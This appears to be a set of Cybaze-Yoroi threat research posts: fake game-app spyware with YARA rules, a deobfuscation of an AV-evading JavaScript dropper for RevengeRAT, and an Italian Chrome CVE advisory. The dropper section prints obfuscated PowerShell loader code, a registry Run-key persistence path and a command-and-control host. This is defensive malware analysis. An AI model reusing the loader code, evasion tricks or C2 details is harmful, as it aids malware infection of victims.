Investigating the package names, it was possible to identify many other fake applications which have spyware behavior too. So, the Apex threat is part of a bigger campaign that rides the wave of the popular games to steal information from passionate gamers, probably related to Fortnite themed samples reported by Fortinet researchers back in 2018.

The similarity between the recent Apex spyware and the old Fortnite one is shown into the following figure, where the same app’s structure emerges.

Figure 18. Comparison between Fortnite and Apex fake apk

Unlike the Apex APK, the fake Fortnite application has been distributed through BitTorrent network via the "ThePirateBay" portal. The use of different channels to spread the samples is the proof that the malware author tried to reach as many users as possible. Anyway, despite the fake Fortnite threat belongs to an old campaign, dated back in 2018, its torrent file is still available online.

Obviously, the only difference between the two APK resides into the resource section. In each campaign the malware author changes icon, video and others media. In the following figure it is possible to notice this difference: on the left there are the Fortnite threat’s resources, including the specific icon, viceversa on the right is possible to see a different icon for Apex apk.

Figure 19. Different resource sections between Fortnite and Apex fake apk

Another evidence the malware author is the same for both campaigns is the e-mail address found in the META-INF file which is always [email protected][.]com”.

Conclusion

Today the malware writers uses the popularity of applications that are not presents on play store to spread their malicious applications. The use of mobile devices has growth in the latest year and many users does not pay attention when downloading an app. The awareness that many of these could be malicious, today, is very low and this is one of the main reason of growth in the number of downloaded apps on mobile device from third parties sources. In this report have been analyzed four fake apps for android found through a search engine. As visible, all of the analyzed apps are malicious and moreover, they are able to steal information in easy way through a simple first interaction provided by users.

The researchers of Cybaze-Yoroi ZLab advise to don’t download s apps from third parties store or sites and verify the presence of the legit app on official store, as EA in this case.

Indicator of Compromise

Yara rules

rule ApexLegends_1_07_03_2019{
	meta:
  	description = "Yara Rule for ApexLegends_sample_in_table3"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_03_07"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = "PK"
    		$b = {B5 7D E3 69 9799 A7 8B E0 44}
    		$c = {80 9B BD F7 AC EE 15 A1 71}
    		$d = {AF 70 0F B6 48 64 98 FA D3 BC 8F}
    		$e = "taptobeginn.mp4"

	condition:
    		all of them
}

rule ApexLegends_2_07_03_2019{
	meta:
  	description = "Yara Rule for ApexLegends_sample_in_table4"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_03_07"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = "PK"
   		$b = {62 B6 72 06 B2 2F B0 85 A2 BD 0B}
    		$c = "00001.9.png"
    		$d = {FD 95 95 B2 73 61 5C DD 05 29}
    		$e = "Atlikta"

	condition:
    		all of them
}

This blog post was authored by Davide Testa, Antonio Farina and Antonio Pirozzi of Cybaze-Yoroi Z-LAB

Evading AV with JavaScript Obfuscation

Introduction

Few days ago, Cybaze-Yoroi ZLAB researchers spotted a suspicious JavaScript file needing further attention: it leveraged several techniques in order to evade all AV detection and no one of the fifty-eight antivirus solution hosted on the notorious VirusTotal platform detected it. For this reason, we decided to dissect it and investigate what kind of tricks the malware used to achieve such result.

Figure 1: Javascript dropper AV detection at 2019-03-01

Technical analysis

The file is written in JavaScript language and it’s natively runnable by the Windows Script Host system component, its size is quite larger than common script files, about 1 MB of random looking text.

Hash (Sha256)99b0b24dcfb29291163b66c60355b6e1454c6a3d5dfbc2cd7b86b1ca548761eb
ThreatGeneric
DescriptionJS/Dropper
Ssdeep6144:+FquQGm+pYEaRFquQGnFquQGHFquQGtFquQG1FquQGrFquQGoFquQGsFquQGRFqa:
+y+yTr5RPkYFV21Ge3bN2u8AVQuK6qzH

Table 1: Information about Javascript dropper.

The first look at this file reveal a first interesting characteristic: the usage of non ASCII charsets all along the body of the script.

Figure 2: Javascript dropper structure

These characters seem to be typed down without any apparent logic, but, a closer look reveals the first technique used by the malware writer. He declared all the variables using long strings combining a mixture of ASCII and UNICODE characters, even including some characters from the Cyrillic alphabet:

ыNиpsфбm3nxsцвиеKEсыBLQBеnьVWC

Figure 3: combination of ASCII and UNICODE characters

The difference among all the variables is visible only in the final part of those declarations after “_” char. So, we can say that the malware writers uses a common prefix for all the variables’ declarations. In the script previously shown in Figure 2, the final part of the variable is declared in the following way:

var = [...]_0x5e24

Figure 4: different part in the defined variables

So the first step to de-obfuscate this code is to replace that prefix with other ones which allow the readability of the code. The result is:

var A_0x5e24=['fromCharCode','function\x20H2B([string]$s){[email protected]();for\x20($i=0;$i\x20-lt\x20$s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return\x20$H;};$_b=(get-itemproperty\x20-path\x20\x27HKCU:\x5cSOFTWARE\x5cMicrosoft\x5cRun\x27\x20-name\x20\x27Microsoft\x27).Microsoft;

Figure 5: first deobfuscation level

Other obfuscation technique found during the analysis is the combination of ascii and hexadecimal character as visible in the script above. It is possible see different hexadecimal char encoding like:

0x27
0x20
0x5c

Figure 6: hexadecimal character used in script of javascript

Replacing these hex represented chars with their ascii encoding end up this way:

0x27 → ‘
0x20 → empty space
0x5c → \

Figure 7: conversion from hexadecimal to ascii characters

After this de-obfuscation step, the script results in:

A_0x5e24=['fromCharCode','function H2B([string]$s){[email protected]();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path ‘HKCU:\SOFTWARE\Microsoft\Run’ -name ‘Microsoft’).Microsoft;

Figure 8: second deobfuscation level

The backslash char before every hexadecimal char is necessary to combine hex with ascii encoding. Now we are able to see the clear code and initial part of executable hidden in the javascript dropper even if it not seems to be well defined. Inside of it, indeed, are present ‘$’ chars and these are not permitted in hexadecimal encoding.

Figure 9: First part of executable in javascript

The first line of the above code replaces all ‘$’ chars contained in _b variable with ‘5’ char. Performing this action manually, it is possible to obtain a well formed Portable Executable, representing the final payload detoned on victim machine after the infection.

Figure 10: Part of executable after replacing  $ with 5 character

The first four char, as we can see, are “4D5A”, magic numbers of the Executable files in Microsoft Windows environments. Once decoded, the payload is written down to the following registry key in order to allow its persistence on every reboot.

HKCU\SOFTWARE\Microsoft\Run\Microsoft

Figure 11: registry key used to grant persistence

The extracted executable is widely identified by most of the AV solutions enumerated into the VirusTotal platform.

Figure 12: payload inside of JavaScript dropper AV detection at 2019-02-28

The binary is a variant of a well known Remote Access Trojan abused by several cyber-criminals, a “RevengeRAT” configured to with the following command and control server:

networklan[.]asuscomm[.]com

Figure 13: Command and Control contacted by malware

Conclusion

The analysis of this malicious JS script brings a significant evidence about how threat actors are able to easily hide malware to the eyes of anti-virus technologies, even if belonging to widely known families such as RevengeRAT. A few manipulations of the dropper code are enough to ensure a zero detection rate.

Also, another aspects of this case need attention. Even after several days from its discovery, and its subsequent sample submission on the VirusTotal platform on 28th February 2019, only two AV solutions result to be able to correctly identify this file, a performance confirming modern threats could not be tackled with a single, automated tool.

Figure 14: JavaScript dropper AV detection at 2019-03-04

This blog post was authored by Davide Testa, Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB

Vulnerabilità 0-Day in Google Chrome

Proto: N030319.

Con la presente Yoroi desidera informarLa relativamente alla recente scoperta di una grave vulnerabilità all’interno di Google Chrome, browser web utilizzato in oltre il 60% delle navigazioni internet. La criticità è nota con l’identificativo CVE-2019-5786.

La problematica è causata da lacune nella gestione della memoria all’interno delle primitive “FileReader”, attraverso le quali un attaccante remoto può essere in grado di eseguire codice arbitrario sulla macchina vittima, permettendogli di prenderne il controllo ed infettarla con malware di varia natura. Tale circostanza può rappresentare un rischio di sicurezza nel contesto di scenari di attacco opportunistici, basati su campagne di “Malvertising” (advertising malevolo), all’interno di "Exploit-Kit", od in scenari mirati, come ad esempio in attacchi "Watering-Hole".

Il Manutentore ha confermato la vulnerabilità rilasciando la versione 72.0.3626.121 del browser in grado di risolvere la problematica che affligge sia sistemi Windows, che Mac e Linux.

Benché i dettagli tecnici della vulnerabilità siano stati tenuti momentaneamente privati, il “Threat Analysis Group” di Google ha riportato di essere a conoscenza dell’esistenza di exploit funzionanti “in-the-wild”, pertanto Yoroi suggerisce caldamente di pianificare l’applicazione delle patch di sicurezza disponibili all’interno del Vostro parco macchine client.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index